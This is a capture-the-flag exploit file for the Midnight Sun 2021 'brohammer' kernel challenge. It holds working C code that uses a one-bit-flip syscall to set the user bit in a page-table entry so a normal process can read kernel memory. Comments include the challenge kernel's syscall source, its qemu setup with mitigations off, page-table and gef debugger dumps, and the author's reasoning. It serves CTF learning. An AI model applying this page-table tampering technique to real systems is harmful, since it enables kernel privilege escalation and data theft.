midnightsun2021_brohammer_exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#ifndef __NR_BROHAMMER
#define __NR_BROHAMMER 333
#endif

void brohammer(unsigned long addr, int bit){
	return syscall(__NR_BROHAMMER, addr, bit);
}	

int main(){
	brohammer(0xffff8800018fb138, 2);
	unsigned char* flag = (unsigned char*)0xffff880004e19000ULL;
	for (unsigned char *j = flag; j < flag + 0x100 && *j; ++j) {
        	printf("%c", *j);
	}
}


/*
#!/bin/bash
qemu-system-x86_64 \
    -m 128M \
    -kernel ./kernel \
    -initrd ./initrd \
    -nographic \
    -monitor /dev/null \
    -append "nokaslr root=/dev/ram rw console=ttyS0 oops=panic paneic=1 quiet" 2>/dev/null

NO KASLR, SMEP, SMAP, KPTI
*/

/*
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/syscalls.h>

#ifndef __NR_BROHAMMER
#define __NR_BROHAMMER 333
#endif

unsigned long flips = 0;

SYSCALL_DEFINE2(brohammer, long *, addr, long, bit)	// define a new syscall with number 333 that flip a specified bit on a specified address
{
        if (flips >= 1)
        {
                printk(KERN_INFO "brohammer: nope\n");
                return -EPERM;
        }

        *addr ^= (1ULL << (bit));
        (*(long *) &flips)++;

        return 0;
}
*/


/*
0xffff880000000000-0xffff880000099000  0x0000000000000000-0x0000000000099000  0x99000      0x1000      153    [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880000099000-0xffff88000009a000  0x0000000000099000-0x000000000009a000  0x1000       0x1000      1      [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff88000009a000-0xffff88000009b000  0x000000000009a000-0x000000000009b000  0x1000       0x1000      1      [R-X KERN ACCESSED DIRTY GLOBAL]
0xffff88000009b000-0xffff880000200000  0x000000000009b000-0x0000000000200000  0x165000     0x1000      357    [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880000200000-0xffff880001000000  0x0000000000200000-0x0000000001000000  0xe00000     0x200000    7      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880001000000-0xffff880001400000  0x0000000001000000-0x0000000001400000  0x400000     0x200000    2      [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff880001400000-0xffff880001404000  0x0000000001400000-0x0000000001404000  0x4000       0x1000      4      [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff880001404000-0xffff880001600000  0x0000000001404000-0x0000000001600000  0x1fc000     0x1000      508    [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880001600000-0xffff880001671000  0x0000000001600000-0x0000000001671000  0x71000      0x1000      113    [R-- KERN ACCESSED DIRTY GLOBAL]
0xffff880001671000-0xffff880001800000  0x0000000001671000-0x0000000001800000  0x18f000     0x1000      399    [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880001800000-0xffff880007e00000  0x0000000001800000-0x0000000007e00000  0x6600000    0x200000    51     [RW- KERN ACCESSED DIRTY GLOBAL]
0xffff880007e00000-0xffff880007fe0000  0x0000000007e00000-0x0000000007fe0000  0x1e0000     0x1000      480    [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000000000-0xffffc90000004000  0x0000000000086000-0x000000000008a000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000008000-0xffffc9000000c000  0x0000000000010000-0x0000000000014000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000010000-0xffffc90000014000  0x0000000000016000-0x000000000001a000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000018000-0xffffc9000001c000  0x000000000001c000-0x0000000000020000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000020000-0xffffc90000024000  0x0000000000023000-0x0000000000027000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000028000-0xffffc9000002c000  0x000000000002a000-0x000000000002e000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000030000-0xffffc90000034000  0x0000000000030000-0x0000000000034000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000038000-0xffffc9000003c000  0x0000000000036000-0x000000000003a000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000040000-0xffffc90000044000  0x0000000000058000-0x000000000005c000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000048000-0xffffc9000004c000  0x000000000005d000-0x0000000000061000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000050000-0xffffc90000054000  0x000000000019b000-0x000000000019f000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000058000-0xffffc9000005c000  0x000000000358d000-0x0000000003591000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000060000-0xffffc90000064000  0x00000000035cb000-0x00000000035cf000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000065000-0xffffc90000068000  0x00000000023c8000-0x00000000023cb000  0x3000       0x1000      3      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc9000006c000-0xffffc90000070000  0x00000000023db000-0x00000000023df000  0x4000       0x1000      4      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000074000-0xffffc90000075000  0x00000000023ec000-0x00000000023ed000  0x1000       0x1000      1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000075000-0xffffc90000076000  0x000000000772b000-0x000000000772c000  0x1000       0x1000      1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000076000-0xffffc90000077000  0x000000000772e000-0x000000000772f000  0x1000       0x1000      1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffc90000077000-0xffffc90000078000  0x0000000007718000-0x0000000007719000  0x1000       0x1000      1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffea0000000000-0xffffea0000200000  0x0000000006000000-0x0000000006200000  0x200000     0x200000    1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000000000-0xfffffe0000001000  0x00000000018c3000-0x00000000018c4000  0x1000       0x1000      1      [R-- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000001000-0xfffffe0000002000  0x0000000001809000-0x000000000180a000  0x1000       0x1000      1      [R-- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000002000-0xfffffe0000003000  0x000000000180f000-0x0000000001810000  0x1000       0x1000      1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000003000-0xfffffe0000006000  0x0000000001806000-0x0000000001809000  0x3000       0x1000      3      [R-- KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000006000-0xfffffe0000007000  0x0000000001401000-0x0000000001402000  0x1000       0x1000      1      [R-X KERN ACCESSED DIRTY GLOBAL]
0xfffffe0000007000-0xfffffe000000c000  0x000000000180a000-0x000000000180f000  0x5000       0x1000      5      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffff81000000-0xffffffff81400000  0x0000000001000000-0x0000000001400000  0x400000     0x200000    2      [R-X KERN ACCESSED DIRTY GLOBAL]
0xffffffff81400000-0xffffffff81404000  0x0000000001400000-0x0000000001404000  0x4000       0x1000      4      [R-X KERN ACCESSED DIRTY GLOBAL]
0xffffffff81404000-0xffffffff81600000  0x0000000001404000-0x0000000001600000  0x1fc000     0x1000      508    [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffff81600000-0xffffffff81800000  0x0000000001600000-0x0000000001800000  0x200000     0x200000    1      [R-- KERN ACCESSED DIRTY GLOBAL]
0xffffffff81800000-0xffffffff81a00000  0x0000000001800000-0x0000000001a00000  0x200000     0x1000      512    [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffffff5fc000-0xffffffffff5fd000  0x00000000fec00000-0x00000000fec01000  0x1000       0x1000      1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffffff5fd000-0xffffffffff5fe000  0x00000000fee00000-0x00000000fee01000  0x1000       0x1000      1      [RW- KERN ACCESSED DIRTY GLOBAL]
0xffffffffff600000-0xffffffffff601000  0x0000000001804000-0x0000000001805000  0x1000       0x1000      1      [R-- USER ACCESSED DIRTY GLOBAL]

gef> search-pattern "this is where the flag will be on the remote host"
[+] Searching 'this is where the flag will be on the remote host' in whole memory
[+] In (0xffff880001800000-0xffff880007e00000 [rw-])
  0xffff880004e19000:    74 68 69 73 20 69 73 20  77 68 65 72 65 20 74 68    |  this is where th  |
[+] Searching 't\x00h\x00i\x00s\x00 \x00i\x00s\x00 \x00w\x00h\x00e\x00r\x00e\x00 \x00t\x00h\x00e\x00 \x00f\x00l\x00a\x00g\x00 \x00w\x00i\x00l\x00l\x00 \x00b\x00e\x00 \x00o\x00n\x00 \x00t\x00h\x00e\x00 \x00r\x00e\x00m\x00o\x00t\x00e\x00 \x00h\x00o\x00s\x00t\x00' in whole memory
gef> x/s 0xffff880004e19000
0xffff880004e19000:	"this is where the flag will be on the remote host...\n"
gef> xinfo 0xffff880004e19000
---------------------------------------------------------------------------------------- xinfo: 0xffff880004e19000 ----------------------------------------------------------------------------------------
Virtual address start-end              Physical address start-end             Total size   Page size   Count  Flags
0xffff880001800000-0xffff880007e00000  0x0000000001800000-0x0000000007e00000  0x6600000    0x200000    51     [RW- KERN ACCESSED DIRTY GLOBAL]
Offset (from virt mapped):  0xffff880001800000 + 0x3619000
Offset (from phys mapped):  0x1800000 + 0x3619000

Physical address	: 0x4e19000
Physical map pages size : 2 MiB

0x4e19000 % 2**21 => 0x1900 => Address of 2MiB aligned page starts at 0x4e00000

Thanks to 'xinfo' I started checking the physical address start until I find 0x4e00000 using the command 'xp'
xp -- Dump physical memory via qemu-monitor. (gef)

After manually inspecting all address from 0x1800000 I reached:
gef> xp 0x18fb138
00000000018fb138: 0x8000000004e001e3

So we need to flip 0xffff8800018fb138, but which bit??? StackOverflow gave me an answer:
https://stackoverflow.com/questions/59948388/how-to-properly-set-privileges-in-page-directory-entries

So if we flip the 2° bit we can read the content of those mapping also from userland...
*/